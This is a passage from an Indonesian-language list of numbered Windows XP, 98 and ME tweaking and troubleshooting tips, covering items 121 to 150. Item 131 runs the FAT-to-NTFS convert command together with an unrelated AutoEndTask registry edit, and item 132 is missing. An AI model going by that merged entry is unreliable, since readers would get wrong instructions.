121. Ada utility dalam Windows XP Pro Edition yang jarang digunakan, yakni gpedit. Jalankan utility ini dengan mengetikkan “gpedit.msc” tanpa tanda petik di kotak dialog Run dan tekan Enter. Utility ini bisa digunakan untuk setiap tool dan komponen yang ada di Windows. Coba satu per satu setting yang Anda inginkan kemudian perhatikan hasilnya.
-> STEP BY STEP
122 .Mengatur Jadwal Perawatan Daripada bersusah payah membersihkan sampah di Windows, atur agar Windows membersihkan dirinya sendiri secara berkala dengan Schedule Task.
1. Untuk mengatur jadwal perawatan Windows secara berkala, buka Control Panel, klik ganda Scheduled Tasks. Tambahkan Scheduled Task melalui wizard. Klik Next untuk masuk dalam list berisi program yang bisa dijadwalkan.
2. Jika tool yang hendak Anda jadwalkan tidak tertera pada list, klik Browse dan arahkan ke folder tempat tool yang Anda maksud berada. Kebanyakan tool Windows berada dalam folder Windows\system32. Pilih salah satu dan klik Open.
3. Ketik nama task tersebut dan tentukan tingkat keseringan atau frekuensi jadwal program tersebut. Klik Next, atur setting lain yang diperlukan dan tambahkan username beserta password untuk mengamankan Schedule Task.
123. Gunakan utility gratis PowerToys dari www.microsoft.com/windowsxp/home/downloads/powertoys.asp yang sangat berguna. PowerToys sendiri terdiri dari beberapa program, di antaranya Open Command Window Here, Alt-Tab Replacement, Tweak UI, Power Calculator, Image Resizer, CD Slide Show Generator, Virtual Desktop Manager,Taskbar Magnifier, HTML Slide Show Wizard, dan Webcam Timershot.
124. Windows Anda bisa memperoleh tambahan kecepatan jika Indexing Service dinonaktifkan. Caranya mudah, buka Administrative Tools di Control Panel, pilih Services dan disable Indexing Service.
125. Kembangkan kapasitas harddisk dengan menggunakan Disk Cleanup. Buka My Computer, klik kanan drive yang ada dan pilih Properties. Buka tab General dan klik tombol Disk Cleanup. Bersihkan semua file sampah tersebut, termasuk mengosongkan isi Recycle Bin dari semua data yang sudah tidak digunakan lagi.
126. Hilangkan semua shortcut di folder Startup dalam Start Menu. Sebab, program yang memiliki shortcut dalam folder ini secara otomatis akan dieksekusi saat kali pertama Windows dijalankan.
127. Periksa setting messenger yang ada dalam komputer Anda, karena hampir setiap messenger akan me-load dirinya sendiri secara otomatis setiap kali Windows dijalankan. Usahakan agar option Automatically Login atau Load at Windows Start tidak aktif.
128. Anda bisa mengakses setiap program secara langsung dengan mengetikkan nama programnya di kotak dialog Run. Misalnya calc untuk kalkulator, winword untuk Microsoft Word, dan lain sebagainya.
Troubleshooting Sederhana 129. Jika saat defrag tiba-tiba komputer berhenti, restart dan masuk dalam Safe Mode dengan menekan tombol F8 sesaat sebelum Windows mulai berjalan. Defrag lagi harddisk Anda dari mode ini.
130. Cari tahu apakah drive Anda FAT atau NTFS dengan mengklik kanan drive tersebut dan memilih Properties kemudian masuk ke tab General. Baca detail file system pada kotak dialog yang muncul.
131. Ubah sebuah drive dalam format FAT menjadi NTFS melalui DOS dengan perintah convert c:/FS:NTFS. Masuklah dalam registry editor dan buka direktori HKEY_USERS\DEFAULT\Control Panel\Desktop dan buat value dalam AutoEndTask dengan nilai 1.
133. Jika saat menginstal sebuah driver baru komputer hang, restore komputer ke konfigurasi sebelumnya. Caranya, restart komputer dan tekan F8 untuk masuk ke Safe Mode dan pilih option Last Known Good Configuration.
134. Gunakan Event Viewer untuk melacak aplikasi yang error. Caranya, klik kanan My Computer, pilih Manage dan klik event Viewer. Klik ganda setiap aplikasi atau system yang menunjukkan error untuk melihat informasi kesalahan.
135. Ada cara paling tepat untuk mengatur ketepatan jam di komputer. Klik ganda jam di sebelah kanan bawah layar atau di system tray, pilih tab Internet Time. Aktifkan option Automatically synchronize with an Internet time server. Pilih server yang tersedia dan klik Update Now!
Tip dan Trik Spesial untuk Windows 98 dan ME 136. Back-up setting dial-up dengan cara men-drag and drop file koneksi di folder Dial Up Networking ke sebuah floppy drive. File back-up akan disimpan dalam ekstensi.dun.
137. Cara cepat restart, tekan Start|Shut Down|Restart, sementara klik OK, tahan tombol Shift.
138. Gunakan Tweak UI khusus Windows 98 dari www.microsoft.com/ntworkstation/downloads/powertoys/networking/nttweakui.asp. Setelah instalasi selesai, buka Tweak UI melalui Control Panel.
139. Gunakan tombol F3 untuk membuka fitur Find saat berada di Windows Explorer atau desktop.
140. Atur koneksi dial-up dengan Telephony Location Manager. Fitur Telephony Location Manager ini akan membantu Anda mengoptimalkan koneksi dial-up. Caranya, klik Start|Run dan ketikkan “tlocmgr” tanpa tanda kutip.
141. Jika komputer Anda tidak bisa di-set Dalam mode standby atau suspended, maka perbaiki dengan Pmtshoot dari http://support.microsoft.com/?kbid=185949.
142. Selalu back-up registry sebelum melakukan perubahan di dalamnya. Caranya, gunakan Registry Checker yang bisa ditemui di Start|Programs| Accessories|System Tools|Tools.
143. Buat sebuah disket bootable untuk Windows 98 dengan cara memformatnya menggunakan system files. Kemudian copy file c:\windows\command\scanreg.exe dan c:\windows\himem.sys ke dalam disket tersebut. Jangan lupa, edit file config.sys yang berada di disket dengan memberi tambahan baris “device =a:\himem.sys” tanpa tanda kutip.
144. Untuk me-restore registry saat komputer tidak mau berjalan, coba booting dengan boot disk. Kemudian masuk ke drive C:\ dan ketikkan “scanreg\restore”, tanpa tanda kutip. Ikuti angkah-langkahnya hingga selesai. Kemudian keluar dari DOS.
145. Tambahkan shortcut Control Panel ke Start Menu dengan mengklik kanan tombol Start dan klik Open. Kemudian klik kanan di area kosong, pilih New|Folder. Isikan “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” tanpa tanda kutip dan tekan Enter.
146. Anda bisa menghilangkan kotak dialog password yang muncul kali pertama sebelum masuk dalam Windows. Caranya, masuk ke Control Panel, buka Password dan buka tab Change Password. Isi kolom password lama dengan password yang Anda miliki, dan kosongkan kolom new password. Setelah itu, klik tab User Profiles dan enable option All users of this PC use the same preferences and desktop settings. Perubahan ini akan berjalan setelah Windows di-restart.
147. Untuk membatalkan perintah Print, buka icon Printer di system tray dengan mengklik ganda. Kemudian sorot file yang sedang di-print pada Window Printer dan klik kanan kemudian Cancel.
148. Temukan tool-tool under DOS yang masih layak dipergunakan dalam folder tools\MSDOS di CD Instalasi Windows 98.
149. Jika Windows 98 atau Me berjalan lambat, periksa memory. Caranya, klik kanan My Computer dan pilih Properties. Buka tab Performance dan lihat System Resource. Jika mencapai 80 persen, restart komputer. Ingat, tutup semua program sebelum melihat System Resource.
150. Gunakan Sysedit untuk mengedit file-file system. Misalnya Autoexec.bat dan sebagainya. Ketikkan “sysedit” di kotak dialog Run tanpa diberi tanda petik.